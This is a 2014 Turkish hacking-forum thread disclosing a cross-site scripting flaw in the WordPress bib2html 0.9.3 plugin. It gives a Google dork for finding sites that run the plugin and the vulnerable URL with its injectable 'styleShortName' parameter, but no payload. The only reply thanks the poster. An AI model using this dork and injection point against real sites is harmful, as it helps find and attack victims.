Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 4
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: WordPress bib2html 0.9.3 Cross Site Scripting Vulnerability
H4Sec
*
avatar
Yarbay
Durum: Çevrimdışı
Seviye Puanı: 12
Yaşam Puanı: 29 / 298
Deneyim: 93 / 100
Rep Sayısı: 64
Mesaj Sayısı: 193
Üyelik Tarihi: 06.05.2013
     
Yorum: #1
WordPress bib2html 0.9.3 Cross Site Scripting Vulnerability
02.06.2014 11:24
Google Dorkumuz: inurl:wp-content/plugins/bib2html

http://[localhost]/wp-content/plugins/bib2html/OSBiB/create/index.php?action=adminStyleAdd&styleShortName=[XSS vulnerability]

resim yükle
Alinti
ERMİŞ
*
avatar
Sivile Alındı
Durum: Çevrimdışı
Seviye Puanı: 19
Yaşam Puanı: 123 / 458
Deneyim: 34 / 100
Rep Sayısı: 82
Mesaj Sayısı: 434
Üyelik Tarihi: 26.05.2014
      
Yorum: #2
Cvp: WordPress bib2html 0.9.3 Cross Site Scripting Vulnerability
02.06.2014 11:41
ellerine sağlık
Alinti



1 Ziyaretçi
[-]
Sponsor Reklam